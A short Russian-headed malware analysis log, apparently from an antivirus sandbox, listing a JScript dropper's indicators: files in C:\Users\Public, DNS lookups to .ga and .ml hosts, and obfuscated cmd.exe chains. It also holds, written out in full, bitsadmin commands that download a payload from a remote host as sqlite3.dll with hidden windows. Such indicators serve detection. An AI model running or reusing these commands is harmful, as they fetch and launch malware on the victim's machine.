Техническая информация
- '%WINDIR%\explorer.exe' /c, C:\Users\Public\Documents\ISqnxmv.js
- C:\users\public\documents\isqnxmv.js
- nul
- C:\users\public\h
- '37###u.vpnsp.ga':443
- http://39####.brigaderua.ml/?03#
- DNS ASK 39####.brigaderua.ml
- DNS ASK 37###u.vpnsp.ga
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Documents\ISqnxmv.js"
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Documents\ISqnxmv.js"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /V /C "echo %APPDATA%\YWC34335258749Y\>C:\Users\Public\h"&& exit' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer 39987219873 /priority foreground https://37oo8u.vpnsp.ga/?443432332224046857687130586841094 "%APPDATA%\YWC34335258749Y\sqlite3.dll"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p lk940hd="%LXP:ILXWE=%%7hiq289:1DOLB=/%" 0<nul 1>C:\Users\Public\Documents\ISqnxmv%VIR%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" md \ |"
- '<SYSTEM32>\cmd.exe' /S /D /c" cd %WINDIR% 1>nul"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo exPlOreR /c, C:\Users\Public\Documents\ISqnxmv%VIR%s"
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V /C "echo %APPDATA%\YWC34335258749Y\>C:\Users\Public\h"&& exit
- '<SYSTEM32>\bitsadmin.exe' /transfer 39987219873 /priority foreground https://37oo8u.vpnsp.ga/?443432332224046857687130586841094 "%APPDATA%\YWC34335258749Y\sqlite3.dll"